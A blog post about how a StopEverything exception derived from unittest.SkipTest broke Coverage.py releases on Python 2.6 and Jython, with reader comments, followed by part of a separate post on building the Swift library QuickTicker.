It felt a little off to derive a product exception (StopEverything) from a testing exception (SkipTest), but that seemed acceptable. One place in the code, I had to deal specifically with StopEverything. In an inner loop of reporting, we catch exceptions that might happen on individual files being reported. But if this exception happens once, it will happen for all the files, so we wanted to end the report, not show this failure for every file. In pseudo-code, the loop looked like this:
for f in files_to_report:
try:
generate_report_for_file(f)
except StopEverything:
# Don't report this on single files, it's a systemic problem.
raise
except Exception as ex:
record_exception_for_file(f, ex)
This all seemed to work well: the tests skipped properly, without a ton of noise all over the place. There were no test failures in any supported environment. Ship it!
Uh-oh: very quickly, reports came in that coverage didn’t work on Python 2.6 any more. In retrospect, it was obvious: the whole point of the “from coverage.backunittest” line in the code above was because Python 2.6 doesn’t have unittest.SkipTest. For the Coverage.py tests on 2.6, I install unittest2 to get a backport of things 2.6 is missing, and that gave me SkipTest, but without my test requiements, it doesn’t exist.
So my tests passed on 2.6 because I installed a package that provided what was missing, but in the real world, unittest.SkipTest is truly missing.
This is a conundrum that I don’t have a good answer to:
How can you test your code to be sure it works properly when the testing requirements aren’t installed?
To fix the problem, I changed the definition of StopEverything. Coverage.py 4.3.3 went out the door with this:
class StopEverything(unittest.SkipTest if env.TESTING else object):
"""An exception that means everything should stop."""
pass
The env.TESTING setting was a pre-existing variable: it’s true if we are running the coverage.py test suite. This also made me uncomfortable: as soon as you start conditionalizing on whether you are running tests or not, you have a very slippery slope. In this case it seemed OK, but it wasn’t: it hid the fact that deriving an exception from object is a dumb thing to do.
So 4.3.3 failed also, and not just on Python 2.6. As soon as an exception was raised inside that reporting loop that I showed above, Python noticed that I was trying to catch a class that doesn’t derive from Exception. Of course, my test suite didn’t catch this, because when I was running my tests, my exception derived from SkipTest.
Changing “object” to “Exception” would fix the problem, but I didn’t like the test of env.TESTING anyway. So for 4.3.4, the code is:
class StopEverything(getattr(unittest, 'SkipTest', Exception)):
"""An exception that means everything should stop."""
pass
This is better, first because it uses Exception rather than object. But also, it’s duck-typing the base class rather than depending on env.TESTING.
But as I kept working on getting rid of test failures on Jython, I got to this test failure (pseudo-code):
def test_sort_report_by_invalid_option(self):
msg = "Invalid sorting option: 'Xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
coverage.report(sort='Xyzzy')
This is a reporting operation, so Jython will fail with a StopEverything exception saying, “This implementation of Python doesn’t support code analysis.” StopEverything is a CoverageException, so the assertRaisesRegex will catch it, but it will fail because the messages don’t match.
StopEverything is both a CoverageException and a SkipTest, but the SkipTest is the more important aspect. To fix the problem, I did this, but felt silly:
def test_sort_report_by_invalid_option(self):
msg = "Invalid sorting option: 'Xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
try:
coverage.report(sort='Xyzzy')
except SkipTest:
raise SkipTest()
I knew this couldn’t be the right solution. Talking it over with some co-workers (OK, I was griping and whining), we came up with the better solution. I realized that CoverageException is used in the code base to mean, “an ordinary problem from inside Coverage.py.” StopEverything is not an ordinary problem. It reminded me of typical mature exception hierarchies, where the main base class, like Exception, isn’t actually the root of the hierarchy. There are always a few special-case classes that derive from a real root higher up.
For example, in Python, the classes Exception, SystemExit, and KeyboardInterrupt all derive from BaseException. This is so “except Exception” won’t interfere with SystemExit and KeyboardInterrupt, two exceptions meant to forcefully end the program.
I needed the same thing here, for the same reason. I want to have a way to catch “all” exceptions without interfering with the exceptions that mean “end now!” I adjusted my exception hierarchy, and now the code looks like this:
class BaseCoverageException(Exception):
"""The base of all Coverage exceptions."""
pass
class CoverageException(BaseCoverageException):
"""A run-of-the-mill exception specific to coverage.py."""
pass
class StopEverything(
BaseCoverageException,
getattr(unittest, 'SkipTest', Exception)
):
"""An exception that means everything should stop."""
pass
Now I could remove the weird SkipTest dance in that test. The catch clause in my main() function changes from CoverageException to BaseCoverageException, and things work great. The end...?
One of the reasons I write this stuff down is because I’m hoping to get feedback that will improve my solution, or advance my understanding. As I lay out this story, I can imagine points of divergence: places in this narrative where a reader might object and say, “you should blah blah blah.” For example:
- “You shouldn’t bother supporting 2.6.” Perhaps not, but that doesn’t change the issues explored here, just makes them less likely.
- “You shouldn’t bother supporting Jython.” Ditto.
- “You should just have dependencies for the things you need, like unittest2.” Coverage.py has a long-standing tradition of having no dependencies. This is driven by a desire to be available to people porting to new platforms, without having to wait for the dependencies to be ported.
- “You should have more realistic integration testing.” I agree. I’m looking for ideas about how to test the scenario of having no test dependencies installed.
That’s my whole tale. Ideas are welcome.
Update: the story continues, but fair warning: metaclasses ahead!
It looks to me like the typical case of „test-induced design damage”. Code should not be burdened with test runner workarounds.
I bet that one day someone will complain about coverage making their test runner skip tests.
I think a better way is to handle this in coverage's test suite. Possible solution: wrap all your tests in a decorator that reraises with a SkipException.
@Ionel, that's an interesting point. Do you have an example of wrapping the tests that doesn't involve adding a decorator to every test or test class?
How about this:(Ronny approves :D)
For integration testing, I'm increasingly using auxiliary toxenvs which do not install test requirements and which perform a simple smoke test of one known configuration. Then you just run them alongside your toxenvs which run your test suite. We do this for e.g. permutations of our setuptools extras.
Sample:
[toxenv:cli]
deps =
commands =
pip install {toxinidir}
{envbindir}/coverage run someexample
{envbindir}/coverage html
You can get more elaborate obviously with your smoke testing, but yeah, in a basic sense, tox has worked OK for that use case.
It sounds like that in this case even the simple smoke test there would have possibly found your issue?
Wonderful write-up Ned. Thank you for taking the time to share it with us all. I can certainly relate - we ignore our gut feelings (life-data trained heuristics?) at our peril...
Big thank you!
This python coverage tool is simply great. I had a test suite for some c-python 2.7 code and i was able to produce (beautifully colored) reports in about an hour or so. THANK YOU ALL!
For Jython, I needed a little longer, but a few minutes ago I got the first meaningful coverage list.
On Windows, file path case seems to make a difference, I got zero coverage when I ran 030_src\mytool.py instead of 030_Src\mytool.py
Add a comment: | https://nedbatchelder.com/blog/201701/a_tale_of_two_exceptions.html | CC-MAIN-2018-13 | refinedweb | 2,025 | 66.44 |
ok, so i have a problem to do in java that i just can't seem to figure out. here is the problem:.
i dont have a problem with formatting the output or anything i just cant seem to figure this out.
Here's my code:
import java.util.*; public class Problem2 { public static void main(String args[]) { double dblCount = 0; double dblBalance = 0; Scanner sc = new Scanner(System.in); System.out.print("How many Balances will you be entering?: "); double dblNumber = sc.nextDouble(); do { dblCount = dblCount + 1; System.out.print("Enter a Name: "); String strName = sc.next(); System.out.print("Enter a Balance: "); double dblInput = sc.nextDouble(); if(dblInput > dblInput) { dblBalance = dblInput; } } while(dblNumber >= dblCount); System.out.println(dblBalance); } }
i'm stuck. If sombody could just point me in the right direction that would be great.
Thanks | https://www.daniweb.com/programming/software-development/threads/282419/java-coding-help-needed | CC-MAIN-2017-09 | refinedweb | 138 | 62.54 |
Ruby was a mid-80s radio drama trilogy (at least) produced by ZBS. A clever blend of sci-fi/cyberpunk and film noir styles (yes, I did say radio, but trust me, it fits).
Ruby herself is a futuristic private eye and a typical anti-hero. It’s just a bonus that she can slow time. Complete with far reaching, sinister conspiracies and more than it’s fair share of femme fatales, the series covers the mainstays of film noir. Moreover, I can’t help but think of Molly whenever I think of Ruby, and her Smith-Hitatchi "Godzilla" blaster and heat seeking “deedle darts” make me drool with gadget envy.
The syntax of Ruby is somewhat like that of Pascal. It features a lot of syntactic sugar to accomodate programming the the clearest possible form. The class system is fully-OO, and does not use multiple inheritance. A method called mix-in is used to include modules in a class to define interfaces, much like the similar idea Java uses.
This is the genealogy of the programming language
Ruby:
Ruby is a child of Python, Smalltalk, Eiffel and Perl.
Ruby was born in year 1993.
It became Ruby 0.95 in year 1995.
It became Ruby 1.1 alpha 0 in year 1997.
It became Ruby 1.3.2 in year 1999.
It became Ruby 1.6.1 in year 2000, and has not changed much since that time.
This genealogy is brought to you by the Programming
Languages Genealogy Project.
Ruby and sapphire are the two varieties of the mineral corundum, that is, aluminum oxide (Al2O3). Red corundum is called ruby, and all other colors are called sapphire, but the distinction between ruby and pink or plum sapphire is so controversial that some jewelers may use Pantone color standards to distinguish them. (The name "ruby" is often a selling point for a particular gem.) They form hexagonal crystals and have a mineral hardness of 9, surpassed only by diamond in the natural world.
Large, gem-quality rubies have always been very rare. The huge gems described in medieval romances and oriental literature were most likely exaggerated by the imaginations the authors or were actually garnets or spinels.
The name ruby is derived from the Latin word for red, ruber. Ancient Orientals believed that rubies contained the spark of life, and that the ruby was self-luminous. Over the centuries, rubies have been regarded as symbols of freedom, charity, dignity and divine power. The Burmese believed that rubies ripened like fruit, and that a sapphire buried in the ground would eventually ripen into a ruby. A flawed ruby was considered "overripe".
In the Middle Ages, rubies were thought to bring good health and to guard against wicked thoughts, amorous desires and disputes. Their red color was said to cure bleeding. It was also believed that the ruby darkened in color to warn its owner of coming misfortunes, illness or death.
The first synthetic rubies were formed in 1902 by oxidizing aluminum powder in a hot gas flame, but the gems produced possessed gas bubbles and flecks of aluminum and were easy to identify. Today, it is possible to produce synthetic rubies that are indistinguishable from natural ones to all but the expert eye.
Rubies are most frequently mined in Myanmar (known for clear, deep red "pigeon's-blood" rubies), Sri Lanka (medium-light red), Thailand (dark red to brownish-red), and across Africa (purplish-red). Heat treatment can be applied to improve color and eliminate imperfections, but this typically produces solidified borax within the gem which can be spotted under magnification. Because of their association with royalty, not to mention their rarity, large fine rubies are valued higher than a colorless diamond of the same size.
Ruby is the birthstone for the month of July and is the symbolic gemstone for the 40th wedding anniversary.
One other facet to Ruby I feel would be criminal not to mention is its fully dynamic nature. Unlike Java and some other programming languages which have comparatively static object systems classes in Ruby can be modified/augmented at any time unless they're locked (or frozen in Ruby parlance). So if you want to change the way the base String class works you can just say:
class String
def initialize(...)
# New way for String to behave. Maybe implement taint
# checking?)
end
end
class String
def initialize(...)
# New way for String to behave. Maybe implement taint
# checking?)
end
end
Ruby has this concept of blocks and iterators that form the basis of many the language's looping constructs -
is in many cases objects of a specific type will define their own looping behavior.
Ruby is a hacker's dream :)
Ruby, however, is a more chilled-out electronica influenced affair compared to Rankine's previous work with comparisons to some current trip-hop artists such as Sneaker Pimps mixed with Rankine's more rock-influenced roots. The album Salt Peter was released in 1995 and the belated follow-up Short-Staffed at the Gene Pool trudged out of the corporate quagmire Rankine found herself in by 2001. Remixes of both albums have also been released.
Ed. note: Ruby is indeed the name of the side project, but not a pseudonym for Lesley Rankine. See the Ruby page on Discogs. --mkb
There is an online book available at
Main features of Ruby:
# arrays
myarray = [1, 2, 3, 4]
puts myarray[0]
# hash tables
"one" => 1,
"two" => 2,
"three" => 3,
"four" => 4,
}
puts english['one']
# regexps
if "shoenix" =~ /ni/ then
puts "ni!"
end
# defining a new class
class Shonky
def monkey
puts "monkey monkey monkey!"
end
end
shoe = Shonky.new
shoe.monkey()
# absolute value
test = -4
puts test.abs()
mylist = [1, 2, 3, 4]
# print each value in the list
mylist.each { |i|
puts i
}
# create a new anonymous function
myfunc = lambda { |num| num+1 }
puts myfunc.call(10) # 11
You can find out more in Matz' Rubycon presentation here:
One of the most beloved features of Ruby is its closure-based iterator syntax. It's been noted that this type of functionality can be replicated in some other languages, but tends not to be because the language itself makes it cumbersome. However, there is a unique magic in closures that is very hard to understand for PHP or Java programmers because those languages don't have closures, and even a lot of Perl and Javascript programmers because those languages don't emphasize closures. When I first came to Ruby I soon learned how to use its iterators, but it was several months before I actually did the mental gymnastics to learn what is the concept beneath the syntactic sugar.
First we need some brief definitions (the respective nodes have much more):
Closure: a function along with the environment (variables) in which it was defined.
Iterator: a means of looping through a collection (array, hash, etc) of some sort.
In Ruby an iterator is simply a method that somehow loops over the contents of an object. The object is often a collection type, such as Array or Hash, but an iterator can easily be defined to iterate over anything. For instance, Ruby's native File::open method can be called as an iterator where it returns one line from the file each iteration.
The magic of ruby iterators is that can call an anonymous function (known as a block in Ruby) that is passed in when the iterator is called. This block looks just like a block in many other languages. Example:
a = [ 1, 2, 3 ]
a.each { |x| print x }
would produce output:
123
So, to clarify the syntax:
a
each
{ }
|x|
print x
Other than being concise, what's so great about this syntax? How would it be any different from a traditional loop such as:
a = [ 1, 2, 3 ]
for i in 0...a.size
print a[i]
end
The iterator is a function that defines some overall semantics of an operation; like how to loop over the members of this collection, and what to return. However, by including a block the function is then infinitely customizable by the programmer. So in effect you are decoupling the overall actions to be performed on the collection (in this case: loop through it) from the actions to be performed on each individual member (in this case: print it). However there's more to it than that.
Let's look at how iterators are implemented. The Array.each method could be defined internally like this:
def each
for i in 0...size
yield(self[i])
end
end
The critical part here is the yield function. This is what calls the block that is passed in. As you can see, each is pretty straightforward. each doesn't return anything, but most other iterators do. Take find, for example:
yield
find
def find
for i in 0...size
if yield(self[i])
return self[i]
end
end
return nil
end
To continue with our previous example, you can call find like this:
a = [ 1, 2, 3 ]
if a.find { |x| x == 2 }
print "FOUND 2!"
else
print "DIDN'T FIND 2!"
end
Just to stem any confusion over how this is interpreted, note that the last value evaluated in a ruby function is automatically returned even if there is no explicit return statement. So in this case, the array items are passed to the block one by one and the expression x == 2 is evaluated and returned to the find function which returns immediately if the block returns a value that evaluates to true, or else returns nil if it gets to the end without finding such an element.
x == 2
Hopefully by now you are starting to see the utility of Ruby's block-based iterators. Certainly blocks used this way can be valuable. However, so far nothing I've shown has required closures. That is to say, we aren't using any previously defined variables in our blocks. So the block could just as well be a traditional method or function defined with a name, and passed to the iterator by reference—something you could do in PHP or Java although it wouldn't be pretty.
No, the true value of Ruby blocks come from the closure property. Consider the following example:
birthdays = ["June 10", "August 20", "December 19"]
my_birthday = database.get_my_birthday()
birthdays.find { |x| x == my_birthday }
Without closures, my_birthday would have to be a parameter passed into the block. But that would require the find method to pass two arguments in its yield statement. Even worse, find would need to have my_birthday passed into it so it could in turn pass it to the block. So we would have something like:
birthdays = ["June 10", "August 20", "December 19"]
my_birthday = database.get_my_birthday()
birthdays.find_equal_to(my_birthday) { |x,y| x == y }
Which is not only longer and uglier than the original with closures, but is far too specific to be of any general use. At this point you may as well hardcode the block into the find_equal_to method (renamed for clarity). Sure, you can still customize the block, but you've lost 99% of the utility of the find method, so why bother when you can probably write a handful of these functions to take care of all the functionality your program needs.
find_equal_to
Earlier I mentioned decoupling the operations on a collection from the operations on its individual members. This is the ruby iterator paradigm. However, it's of critical importance to understand that ruby blocks allow decoupling to occur anywhere—not just between collections and their members. Any method can take a block as its last parameter, and can yield to that block whenever it chooses. Iterators are just the most common use of blocks in ruby, but they are far from being their only use.
In general blocks allow on-the-fly specialization of methods. Without closures a block would be nothing more than an anonymous function, so you could specialize the code of the method but not the data. With closures all your local variables come along for the ride, so your custom code has an infinite amount of context within which to work. I would argue that customizing on the data is the more useful half of the equation since algorithms tend to be general whereas data is unique to each application..
⇒.
5. Zool.
Any species of South American humming birds of the genus Clytolaema..
© Webster 1913.
Ru"by, a.
Ruby-colored; red; as, ruby lips.
Ru"by, v. t. [imp. & p. p. Rubied (?); p. pr. & vb. n. Rubying.]
To make red; to redden.
Pope.
Log in or registerto write something here or to contact authors. | http://everything2.com/title/Ruby | CC-MAIN-2014-35 | refinedweb | 2,112 | 62.48 |
How to know the current core while being compiled for PSoC 6 Dual Core?JoYa_4324706 Apr 19, 2020 1:21 PM
Hi,
I'm trying to understand how to determine the core that is currently being compiled while defining the proper macros for each core. I can see from the device header file with something like:
#if ((defined(__GNUC__) && (__ARM_ARCH == 6) && (__ARM_ARCH_6M__ == 1)) || \ (defined(__ICCARM__) && (__CORE__ == __ARM6M__)) || \ (defined(__ARMCC_VERSION) && (__TARGET_ARCH_THUMB == 3)) || \ (defined(__ghs__) && defined(__CORE_CORTEXM0PLUS__)))
to determine which core header file to include (e.g., core_cm0plus.h or core_cm4.h).
Since I'm using ARMCC, is there any way to understand how __TARGET_ARCH_THUMB is defined to know which core the PSoC Creator is currently compiling?
Thanks!
1. Re: How to know the current core while being compiled for PSoC 6 Dual Core?NoriakiT_91 Apr 19, 2020 5:52 PM (in response to JoYa_4324706)
I created an example project with two interrupts for M0 and M4 as follows.
And confirmed the generated source "cyfitter_sysint_cfg.h" at the interrupt configuration.
/* ARM CM0+ */ #if (((__CORTEX_M == 0) && (CY_CORE_ID == 0))) #define SysInt_M0__INTC_ASSIGNED 1u extern const cy_stc_sysint_t SysInt_M0_cfg; #endif /* ((__CORTEX_M == 0) && (CY_CORE_ID == 0)) */ /* ARM CM4 */ #if (((__CORTEX_M == 4) && (CY_CORE_ID == 0))) #define SysInt_M4__INTC_ASSIGNED 1u extern const cy_stc_sysint_t SysInt_M4_cfg; #endif /* ((__CORTEX_M == 4) && (CY_CORE_ID == 0)) */
It seems that the __CORTEX_M macro is used to specify the current core.
I don't know what is the CY_CORE_ID indicating.
Regards,
Noriaki
2. Re: How to know the current core while being compiled for PSoC 6 Dual Core?JoYa_4324706 Apr 21, 2020 7:25 AM (in response to NoriakiT_91)
Hi NoriakiT_91,
Thanks for the response. Yes I can understand that __CORTEX_M is defined and it is defined in either core_cm0plus.h or core_cm4.h. But however, I would still like to know how it is included in device header file under the #if statement mentioned previously. Specifically, how (defined(__ARMCC_VERSION) && (__TARGET_ARCH_THUMB == 3)) is defined in the source code.
3. Re: How to know the current core while being compiled for PSoC 6 Dual Core?NoriakiT_91 Apr 21, 2020 7:03 PM (in response to JoYa_4324706)1 of 1 people found this helpful
These pre-defined MACROs are declared by the ARM compiler. Please refer following on-line document.
ARM Compiler v5.06 for µVision armcc User Guide : 9.156 Predefined macros
Regards,
Noriaki | https://community.cypress.com/thread/53992 | CC-MAIN-2020-40 | refinedweb | 381 | 56.55 |
What's New in XPath 2.0What's New in XPath 2.0.
Also unlike XPath 1.0 node-sets (and sets in general), sequences may contain duplicates. For example, we can modify our expression above slightly:
(/foo/bar, /foo, /foo/bar)
This sequence consists of the
bar element(s), followed
by the
foo element(s), followed again by the same
bar element(s). In XPath 1.0, it was impossible to
construct such a collection, because, by definition, node-sets may not
contain the same node more than once.
In XPath 1.0, if you wanted to process a collection of nodes, you had to deal with node-sets. In XPath 2.0, the concept of the node-set has been generalized and extended. As we've seen, sequences may contain simple-typed values as well as nodes. We've also seen that sequences differ from node-sets in that they are ordered and may contain duplicates. The question naturally arises: how can you do away with node-sets without breaking XPath?
Indeed, XPath 1.0 node-sets were unordered. However, in XPath's most common context, XSLT, the nodes within the node-set are always processed in some order. The default order used to process node-sets was document order (since there is a document order that is always defined for all nodes). In XSLT 2.0, the default order used to process a node collection (i.e. sequence) is not necessarily document order but, rather, the order of the sequence. To maintain backward compatibility with XPath 1.0, path expressions (and other 1.0 expressions such as union expressions) are defined to always return in document order. Specifically, whenever "/" is used in the immediate expression, you can expect the result to be in document order. In addition, duplicates are automatically removed from the result. XPath 2.0 is thus able to emulate node-sets in a sequence-only world.
If you didn't follow all of that, don't worry. You may not have even realized before now that XPath 1.0 node-sets were unordered. It's mostly for the benefit of specification writers who like to reassure ourselves that everything is consistent and well-defined. Just rest assured that sequences are in fact ordered and path expressions pretty much behave the way they used to.
In addition to introducing many new datatypes and functions, XPath 2.0 introduces a number of new keyword-based operators, some of which we'll look at below.
Perhaps the most powerful new operator in XPath 2.0 for processing
sequences is the
for expression. It enables iteration
over sequences, returning a new value for each member in the argument
sequence. This is similar to what can be done with
xsl:for-each, but it is different in that it is an actual
expression that returns a sequence which can, in turn, be processed as
such.
Consider the following example, which returns a sequence of simple-typed values, each consisting of the total cost of each item in a purchase order.
for $x in /order/item return $x/price * $x/quantity
We could then get the total cost of the order by using the
sum() function.
sum(for $x in /order/item return $x/price * $x/quantity)
Cases such as these are much easier to solve using sequences in
XPath 2.0 than they were in XSLT/XPath 1.0. Without sequences, this
problem is much harder to solve and usually involves constructing a
temporary "result tree fragment" and then using the
node-set() extension function.
Among the more powerful (and oft-requested) constructs added to XPath 2.0 is the conditional expression. Here's an example that's included in the XPath 2.0 working draft.
if ($widget1/unit-cost < $widget2/unit-cost) then $widget1 else $widget2
The XPath 1.0 equals operator (
=) was one of the more
powerful aspects of the language. It was powerful because it could
compare node-sets. Consider the following expression.
/students/student/name = "Fred"
In XPath 1.0, this expression returns true if any student name is equal to "Fred". This might be called existential quantification because it tests for the existence of a member satisfying some condition. XPath 2.0 preserves this functionality but also provides a more explicit way of testing:
some $x in /students/student/name satisfies $x = "Fred"
This formulation is more powerful because you can replace the
$x = "Fred" with any comparison you want, not just
equality comparisons. Also, XPath 1.0 does not provide a way for
testing to see if every student is named "Fred". XPath 2.0
introduces this ability to do universal quantification, using a
similar syntax to the above.
every $x in /students/student/name satisfies $x = "Fred"
In XPath 1.0, the only real set operator was the union operator
(
|). This meant that it was very awkward to determine
whether a given node was in a given node-set. For example, to
determine whether the node
$x is included in the
/foo/bar node-set, we'd have to write something like
/foo/bar[generate-id(.)=generate-id($x)]
or like
count(/foo/bar)=count(/foo/bar | $x)
XPath 2.0's introduction of the
intersect operator
alleviates some of the pain. Instead of going through the above
gyrations, we can simply write
$x intersect /foo/bar
XPath 2.0 also introduces the
except operator, which
can be very handy when we need to select all of a given node-set,
except for certain nodes. In XPath 1.0, if we wanted to, for example,
select all attributes except for the one with a given
namespace-qualified name, we'd have to write
@*[not(namespace-uri()='' and local-name()='foo')]
or
@*[not(generate-id(.)=generate-id(../@exc:foo)]
Once again, XPath 2.0 comes to our rescue with the following pleasant alternative:
@* except @exc:foo
If you take a peek at the XPath 2.0 spec, you'll see that I've left
out a lot of keywords, including things like
cast,
treat,
assert, and
instance
of. These are important parts of the language, but their
importance partially depends on which context you're using XPath 2.0
in. If you will be using XPath in the context of XSLT 2.0, you may not
need to use these every day. You certainly will want to use them in
certain cases (for example, when casting a string to a date), but you
won't be required to use them. In the context of XQuery 1.0, however,
you may need to become intimately familiar with them.
The reason is that XQuery 1.0 is designed to be a statically typed language. Query analysis and optimization are aided by knowledge about what datatypes query expressions will be returning before the query is ever executed. This is only possible if the user explicitly specifies what type each of her expressions are to return. The other advantage of this approach is that errors can be caught early, thereby helping to enforce the correctness of queries.
There is certainly a tradeoff between usability and type safety. To serve the needs of both communities (sometimes artificially divided into the document-oriented and data-oriented worlds), XPath 2.0 provides a means by which the context can decide where it would like to stand in this tradeoff. Effectively, XPath 2.0 can be parameterized by its context. This may sound like a recipe for non-interoperability. However, it is important to identify the guiding principle behind the approach that has been taken. The principle is that any XPath 2.0 expression that does not first return an error will always return the same result as in another context. Thus, while an expression in one context may produce an error and not in another, it will never produce two different expression results. In other words, you always get either a right answer or an error. There is never more than one right answer.
The intended upshot for XSLT users is that they won't have to worry about most of this stuff, most of the time. A given XPath 2.0 expression may throw an "exception" in the XQuery context, but the same expression results in a silently invoked fallback conversion when in the context of XSLT.
It will likely become clear that XPath 2.0 represents a very significant upgrade to XPath 1.0. Its growth has been driven both by the demands of the XPath 1.0 user community, as well as the requirements for XQuery 1.0. Even if you don't agree with the entire outcome, it's hard to deny that it represents a remarkable collaboration. With any luck, it will also represent a very powerful, standard tool for several user communities.
XML.com Copyright © 1998-2006 O'Reilly Media, Inc. | http://www.xml.com/lpt/a/940 | crawl-001 | refinedweb | 1,477 | 58.48 |
Opened 8 years ago
Closed 8 years ago
#6282 release blocker: regression closed fixed (fixed)
Trial tracebacks are not properly trimmed since 12.3.0
Description
Due to the porting effort of trial to Python 3, tracebacks in the trial reporter are no longer properly trimming tracebacks:
from twisted.trial import unittest class Test(unittest.TestCase): def test_it(self): raise Exception()
yields:
[..] [ERROR] Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 138, in maybeDeferred result = f(*args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/internet/_utilspy3.py", line 41, in runWithWarningsSuppressed reraise(exc_info[1], exc_info[2]) File "/usr/lib/python2.7/dist-packages/twisted/internet/_utilspy3.py", line 37, in runWithWarningsSuppressed result = f(*a, **kw) File "/home/ralphm/work/wokkel/trunk/q.py", line 6, in test_it raise Exception() exceptions.Exception: [..]
This is due to importing
runWithWarningsSuppressed from
_utilspy3 instead of
util and an additional frame there. This makes the frames not being trimmed by
Reporter._trimFrames.
Related tickets: #6033 and #6235.
Change History (15)
comment:1 Changed 8 years ago by
comment:2 Changed 8 years ago by
comment:3 Changed 8 years ago by
comment:4 Changed 8 years ago by
Nice catch, fix ready to review.
comment:5 Changed 8 years ago by
comment:6 Changed 8 years ago by
comment:7 Changed 8 years ago by
Can you comment on why the branch changes the assertions made in
test_hiddenException? It seems like that's a general improvement (?) in behavior, rather than a fix for a regression.
comment:8 Changed 8 years ago by
comment:9 Changed 8 years ago by
comment:10 Changed 8 years ago by
comment:11 Changed 8 years ago by
- There are a number of missing docstrings.
TestAsynchronousFail. (It would be nice to add them to the other methods of
TracebackHandlingthat got touched as well.
- The docstring for
test_exceptionisn't clear. The test it is running is synchronous (just raises an exception). I think you mean a test using
twisted.trial.unittest.TestCasewhich *can* handle asynchronous tests.
- The comment in
_trimFramesneeds to be updated and turned into a proper docstring.
- What is going to happen in
_trimFramesis the traceback doesn't look as expected? We should detect this and do something, as well as test this case. (Doing this may have caught the regression.
Please address the above issues and re-submit.
Note for archaeologists:
SynchronousTestCaseuses
twisted.python.util.runWithWarningsSuppressed(which doesn't support deferreds), and
TestCaseuses
twisted.internet.utils.runWithWarningsSuppresedwhich does).
comment:12 Changed 8 years ago by
I've fixed 1-3. I don't think we can do anything for 4, as there are too many different cases that can happen. We already had a test which ought to have caught the regression.
comment:13 Changed 8 years ago by
A couple of last things:
- As discussed on IRC, we should document that
_trimFramesgets called with tracebacks other than the ones we expect (primarly when using testcase not from trial).
_trimFramesshould use
C{}and
L{}for code and references, and have
@paramand
@return
getErrorFramesshould have
@paramand
@return.
Please address the above issues and merge.
(In [36988]) Branching to 'async-trim-frames-6282' | https://twistedmatrix.com/trac/ticket/6282 | CC-MAIN-2021-31 | refinedweb | 534 | 58.69 |
How I built my first open source library
Last week I published my first open source library, QuickTicker. It’s a Swift library that lets you create simple ticker animations using one line of code. The result looks like this:
In this post, I’d like to talk about this project and cover:
- Why I created this library
- How I built it (the coding part)
- Final details (example project, unit tests, README.md, Cocoapods)
- Summary of major points and general advice (aka TLDR)
Why open source?
Starting with the obvious question, the reason I decided to build this library was because this is a functionality that I usually end up incorporating into most of my projects anyway; so I figured I might as well make it a bit more generic and package it up into a library that can be easily added to any project, as opposed to copy & pasting code between projects.
Building this library was also an opportunity for me to practice thinking in terms of APIs and practice building modular code while hiding implementation details. I also had to use generics, which I hadn’t used in any of my previous projects!
What does it do?
When I started this project, my goal was to build a simple library that lets you animate labels similar to the gif above. I ended up adding a few additional features over the course of the project, although the core concept is still the same. Here is the list of features I ended up with:
- Start an animation using just one line of code
- Familiar syntax to anyone who’s used UIView’s animate methods
- Accepts any Numeric value as end value, you don’t have to convert or typecast
- It works even if there is text mixed in with numbers in the same label. Text remains intact while the digits get animated 👍
- Completion handler lets you safely queue-up actions following the animation
- You can optionally specify animation curves and decimal points for the label
- Works on both UILabel and UITextField (I intend to expand this later)
Label animation, the main purpose of this library, is something I’d learned about from a youtube video by Brian Voong. In the video, Brian talks about CADisplayLink and how you can use it to animate text in UILabels to create counters and other similar effects. There is some boilerplate code required to get
CADisplayLinkworking (including selectors and @objc methods), and that’s where I think this library can be useful.
Before I go on, I’d like to mention a talk given at Swift & Fika 2018 by Daniel Kennett about API design. During that talk, Daniel spoke about the API boundary, which is the line between the code of the API and the code of the user. As an API designer, you get to choose where this boundary goes, and this decision can have great ramifications.
The closer the boundary gets to the user code, the more work you have to do as an API designer. In return, the API becomes much easier for the user to implement (think Crashlytics with their ridiculously simple install process). Daniel showed this image to convey that point:
On the other hand, if you decide to place the boundary much closer to your code, you end up having to write less code, but you give the user much more work to do. In return, they usually end up having more control over the API. Daniel offered the example of Spotify Metadata:
I don’t think either approach is wrong. It all depends on what you’re trying to accomplish with your API. In my case with QuickTicker, my goal was to make it as simple as possible for the user to get started, ideally a one-line function call. So I was interested in making something more similar to the first image (Crashlytics).
How I built it (the technical part)
The early versions of the library did not use a dedicated type. Instead, I built it as an extension on the UILabel type (you can still see it in the early commits on github if you’re curious what it looked like). So you would call the API using dot syntax directly on your label, something like this:
let someLabel = UILabel()someLabel.startTicker(duration: 2, endValue: 250)
There were a few things I didn’t like about this approach. I wasn’t a big fan of extending the entire UILabel type, as I didn’t want to pollute the namespace for all UILabels for the user, when they probably only needed to animate one or two labels. This approach also meant that I couldn’t extend the same functionality to other types like UITextField without duplicating all my code.
As an aside, during this early experiment with type extension, I learned that it is actually possible to add stored parameters to type extensions in Swift. To do this, you’d have to define a computed property as an associated object, then access that object using an association key, which is a unique pointer to that association. The end result looks like this:
Sure the syntax is ugly, and very “unswifty”, but it gets the job done, and lets you do something that is otherwise not possible in Swift. I think it’s really cool!
Anyway, back to the main topic 😁 as I mentioned earlier, I ended up scrapping this type extension approach for my API, and I went with a dedicated type. Two types to be precise. One of them publicly available, one internal (not visible to the user).
Now you might be wondering why I didn’t go with a protocol, as it may seem like a good solution here. The problem is that I needed to store properties (you’ll find out why when I discuss the implementation below), and protocols don’t allow that (as far as I know!). They only let you add computed properties, and the trick I mentioned above with associated objects doesn’t work on protocols.
This brings us to my custom types. One of them is a public class named QuickTicker, which contains three class methods. The first method contains all possible parameters, while the other two are convenience methods that call into the main one with some default values. The syntax for these methods is inspired by UIView’s animate methods, which will be familiar to many users.
I could have provided default values to all parameters on the main method instead of writing 3 methods, but that didn’t give me the desired level of granularity when testing out auto-complete options. Another advantage to writing separate methods is you get to specify the auto-complete tooltip text for each one, explaining the default values to the user (e.g. 2 second duration). The auto-complete tooltip by the way is added via /// (3 forward slashes) above the method.
I used the class keyword instead of static for these methods, because I wanted to give the user the option to override them if they wanted to. This class also contains an Options enum. The options include 3 animation curves, as well as a decimalPoints case with an associated value denoting the number of decimals. This options array is a nice way to future-proof the API, as it lets me safely add further options down the line without breaking existing users’ code.
The main method accepts two generic parameters, one for the end value, which could be any Numeric value, and one for the animated label, which (for now) could be a UILabel or a UITextField. It looks like this:
